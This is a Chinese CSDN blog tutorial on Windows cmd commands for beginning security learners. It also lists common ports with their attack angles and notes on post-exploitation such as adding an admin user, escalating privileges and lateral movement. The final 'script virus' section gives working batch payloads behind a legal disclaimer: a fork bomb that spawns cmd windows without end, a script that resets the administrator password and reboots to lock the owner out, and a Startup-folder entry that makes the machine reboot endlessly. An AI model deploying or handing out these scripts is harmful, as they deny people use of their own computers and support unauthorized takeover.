星河飞雪网络安全-Windows基础篇-CSDN博客

1. cd

功能：改变当前目录名或者改变当前目录。

用法：

进入指定盘符： D: （进入 D 盘）

切换当前驱动器的根目录： cd \

返回上一级目录： cd..

从该驱动器切换到另一个驱动器时，格式为 cd /d 路径。

示例： cd C:\Windows （切换到 C 盘的 Windows 目录）

2. dir

功能：列出指定目录中的文件和子目录。

用法： dir [ 路径 ]

示例： dir C:\ （列出 C 盘根目录下的文件和子目录）

3. md （ mkdir ）

功能：创建新目录。

用法： mkdir [ 目录名 ] 或 md [ 目录名 ]

示例： mkdir NewFolder （在当前目录下创建一个名为 NewFolder 的新目录）

4. rd （ rmdir ）

功能：删除空目录。

用法： rmdir [ 目录名 ] 或 rd [ 目录名 ]

示例： rd OldFolder （删除名为 OldFolder 的空目录）

5. del （ erase ）

功能：删除指定的文件。

用法： del [ 文件名 ] 或 erase [ 文件名 ]

示例： del file.txt （删除名为 file.txt 的文件） 6. copy

功能：复制文件到指定位置。

用法： copy [ 源文件 ] [ 目标文件 ]

示例： copy file.txt D:\Backup\file.txt （将 file.txt 复制到D盘的 Backup 目录下）

7. move

功能：移动文件或重命名文件。

用法： move [ 源文件 ] [ 目标文件 ]

示例： move file.txt D:\NewFolder\file.txt （将 file.txt 移动到D 盘的 NewFolder 目录下）

8. attrib

功能：显示或更改文件属性。

用法： attrib [ 参数 ] [ 文件名 ]

示例： attrib +h file.txt （将 file.txt 标记为隐藏文件）

9. type

功能：显示文本文件的内容。

用法： type [ 文件名 ]

示例： type file.txt （查看 file.txt 文件的内容）

1.2 网络管理

1. ipconfig

功能：显示网络配置。

用法： ipconfig [ 参数 ]

示例： ipconfig /all （显示所有网络适配器的详细信息）

2. ping

功能：测试网络连接。

用法： ping [ 目标地址 ]

示例： ping www.example.com （测试与 www.example.com 的网络连接）

3. tracert

功能：跟踪数据包到达目标主机的路径。

用法： tracert [-d] [-h maximum_hops] [-j host-list]

[-w timeout] [-R] [-S srcaddr] [-4] [-6] target_name 示例： tracert www.example.com （跟踪到 www.example.com 的数据包路径）

4. netstat

功能：显示网络连接、路由表、接口统计等信息。

用法： netstat [ 参数 ]

示例： netstat -an （以数字形式显示地址和端口号）

5. nslookup

功能：查询 DNS 信息。

用法： nslookup [-option] [hostname] [server]

示例： nslookup www.example.com （查询 www.example.com 的DNS信息）

1.3 其他常用命令

1. cls

功能：清除屏幕内容。

用法： cls

2. echo

功能：显示消息或将消息写入文件。

用法： echo [ 消息 ]

示例： echo Hello, World! （在屏幕上显示 Hello, World! ）

3. ver

功能：显示 Windows 版本。

用法： ver

4. exit

功能：关闭 cmd 运行程序。

用法： exit

5. chkdsk

功能：检查磁盘并修复文件系统错误。用法： chkdsk [volume[[path]filename]] [/f] [/v] [/r]

[/x] [/i] [/c] [/l[:size]]

示例： chkdsk C: （检查 C 盘并修复错误）

6. sfc

功能：扫描并修复系统文件。

用法： sfc [/scannow] [/verifyonly] [/scanfile=file]

[/verifyfile=file] [/offbootdir=offbootdir

/offwindir=offwindir]

示例： sfc /scannow （扫描并修复所有受保护的系统文件）

2 常见端口服务

2.1常见的端口服务

21 ftp 缓冲区溢出，爆破

23 tenlnet 爆破

80-89 web web服务

443 ssl 端口心脏滴血漏洞

445 smb

1433 mysql

1521 oracle

2083/2082 openel 主机管理系统登录（国外使用较多）

2222 da 虚拟主机管理系统登录（国外）

3128 squid 代理默认端口 - 漫游内网

3306 mysql

3312/3311 kangle 主机管理登录系统

3389 RDP 远程桌面

5432 postgrsql 关系数据库

5900 vnc （ shodan 演示）未授权访问

6379 redis 非关系型数据库 ( 未授权 )

7001 、 7002 weblogic 默认弱口令，反序列化

7778 kioxo 主机控制面板登录

8009090 一些常见 web 端口，有些运维喜欢把管理后台开在非 80 端口上面

8080 tomcat ,wdcp 主机管理系统，默认弱口令

8080 ， 8089 ， 9090 jboss

8083 vestacp 主机管理系统（国外较多）

8649 ganglia

8888 宝塔主机管理默认端口

10000 virtuamin/webmin 服务器虚拟管理系统

11211 memcache 未授权访问

27017 、 27018 mongodb 未授权访问（ shodan ）

28017 mongodb 统计系统页面

3 windows和linux区别

1.文件系统

linux：fhs目录结构，块设备挂载到目录（一切都是文件）

win：以驱动器盘符起始，或通过目录挂载分区

2.路径格式

linux： /开始，区分大小写（左斜线）

win：\分隔路径，不区分大小写（右斜线）

3.系统配置

linux：etc/和/proc（存储在信息目录）

win：注册表（存储信息在注册表里）

4.windows四种shell接口

1、GUI图形化用户接口，操作简单

2、cmd命令行用户接口，包含一组预定义命令

3、wmic微软基于wbem的实现，从21h1版本已经弃用，被powershell替代了

4、powershell自动化脚本框架，支持.net架构

5.wsl在win上运行的子系统

6.cmd内置命令

cd\（切换到根目录）

help（查看cmd内置命令）

4 常见的cmd命令

1.echo

echo /？（查看echo的帮助提示）

echo 1（输出1）

echo 1>1.txt （输出1并且重定向到1.txt）

echo 456789 >>1.txt （把内容追加到1.txt）

如果再用就会把文件覆盖掉

2.dir（展示当前目录的文件）

3. d: c:等和cd

d:（切换到d盘）

cd.（进入当前目录）

cd..（回退到上一级目录）

cd /文件夹

cd desktop（切换到桌面）

4.tree（文件树状图、在内网比较常用）

tree /?（查看帮助文档）

/f（显示每个文件夹中的名称）

/a（使用ascii字符，而不使用扩展字符）

tree C:\users\administrator /f

tree C:\users\administrator /a

（在渗透测试中比较常用）

5.md创建目录和rd删除目录

md是mkdir的缩写（作用一样）

md kkk （在当前目录创建名为kkk的文件夹）

rd kkk（删除kkk文件夹）

tab补全功能

6.ipconfig

查看网络本机ip地址

ipconfig /all（把所有的网络信息打印出来）

7.cls（清屏）

8.copy（复制拼接文件）

copy /？（查看帮助文档）

copy 1.txt ..\1.txt（把文件1.txt复制到上一级目录）

先利用cd..回退到上一级目录再利用dir命令查看

copy 1.txt desktop\2.txt

（把admin文件夹中的1.txt复制到桌面并重命名2.txt）

和echo配合使用

echo 123>1.txt

再echo 456>2.txt

copy 1.txt+2.txt>3.txt

9.move（文件移动）

move ..\1.txt 4.txt（把上一级目录中的1.txt移动到本级目录，并且重命名4.txt）

10.ren（重命名）

ren 4.txt 5.txt（把4.txt改名为5.txt）

11.del（删除）

del 1.txt 2.txt 3.txt（永久删除不会进入回收站）

12.ping（一般用于探测主机ip是否存活）

ping /？（查看帮助文档）

-t（一直ping）

13.type（显示文本文件的内容）

echo sdafasdfasdfa>>1.txt

type 1.txt（查看文件内容）

14.reg（注册表）

reg /？（查看帮助文档）

15.nslookup（探测域名信息）

nslookup www.baidu.com

nslookup -d www.baidu.com（查看历史解析记录）

16.find（查找）

find /？（帮助文档）

先在1.txt中输入各种字符串，find "a" 1.txt（在1.txt中查找带a的字段）

find /n "a" 1.txt（查找a参数的字段并排序行号）

type跟find结合使用使用type 1.txt | find "a"（查看带有a参数的字段）

type 1.txt | find "a" /n（查看1.txt的内容并输出a参数的字段并排序）

17.tasklist（任务列表显示进程的名称信息）

18.taskkill（杀死进程）

taskkill /？（帮助文档）

-pid -f -t

taskkill /pid 2824 杀死进程

遇到杀不掉的进程加一个/f参数即可

19.ver、winver（显示版本）

20.start（启动开始命令）

start cmd（打开cmd）

start calc（打开计算器）

start ping www.baidu.com -t

21.systeminfo（查看整个系统信息）

查看一些比较重要的信息补丁信息，后期提权就是针对一些不同的修补进程，用于内网渗透

22.logoff（注销）

先logoff /？（帮助文档）

logoff（注销提权情况下进行3389 的连接桌面的话，有可能机器是连接状态，我们要利用这个命令把对方的远程登录注销）

23.shutdown（关机）/s /f /t /a /r /g /l

shutdown /？（帮助文档）

参数很多

shutdown /s（在一分钟内关机）

shutdown /a（计划取消）

shutdown /r（重启）

shutdown /g （在一分钟内关机）

shutdown /r /t 0 （/t设置时间设置0立即执行）

24.telnet（协议工具）

控制面板->程序->打开或关闭windows功能->telnet客户端

telnet（之前在shodan中思科的设备就是基于这个）

25.arp（自己ip和物理机的影射关系表）

arp /？（帮助文档）

arp /a（拿到内网机器后通过这个命令可以有助于横向移动，用于发现同一网络有哪些主机）

26.at（定时任务）

定时关机 at 时间 "shutdown /s /r /t 0"

at "shutdown /r /t 0"

取消命令 at 1 /delete

27.net（服务）

net stop telnet（关闭telnet）

net start telnet（打开telnet）

net user（看当前用户）

net user admin 123 /add （添加用户名admin 密码为123的用户）

net user admin （查看admin用户名权限）

net user administrator（查看管理员用户权限）

怎么把admin变成管理员权限

net localgroup administrator admin /add（提权）

net user admin （查看admin用户权限）

net user admin （删除用户）

5 脚本病毒

本文主要用做技术分享，所有内容仅供参考。任何使用或者依赖于本文信息所造成的法律后果均与本人无关。请读者自行判断风险，并遵循相关法律法规。

5.1资源耗尽病毒、bat脚本

echo start cmd > 1.txt

echo %0 >> 1.txt

ren 1.txt 1.bat

详细分析：

利用echo将启动cmd窗口命令写入到1.txt文件中，接着%0表示用于无限循环执行当前批处理文件，然后将1.txt文件改成1.bat脚本文件，执行后就会无限循环执行启动cmd窗口

5.2 锁机病毒

echo net user administrator 123456 > c:\windows\Temp\1.bat

echo shutdown /r /t 0 >> c:\windows\Temp\1.bat

详细分析：

echo输出文件，先利用net将administrator用户的密码改成123456，并且将这一句保存到1.bat文件中，接着在1.bat文件中写入立刻重启计算机命令，重启完成之后，就会显示要密码登录，这里也可以用注销命令，如果攻击者使用复杂密码，那么就锁机了

5.3 无限重启病毒

echo shutdown /r /t 0 > C:\windows\Temp\1.bat

copy C:\windows\Temp\1.bat "%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\"

详细分析：

利用echo将立刻重启命令写入到windows\temp目录下的1.bat文件中，其中"%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\"的意思是将文件1.bat拷贝到开机自启动文件夹，所有重启电脑后，就又会重新打开1.bat就实现了无限重启的效果

Windows系统目录接管与渗透的关系

"%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\"

C:\windows\Temp\1.bat（重启自动清空缓存）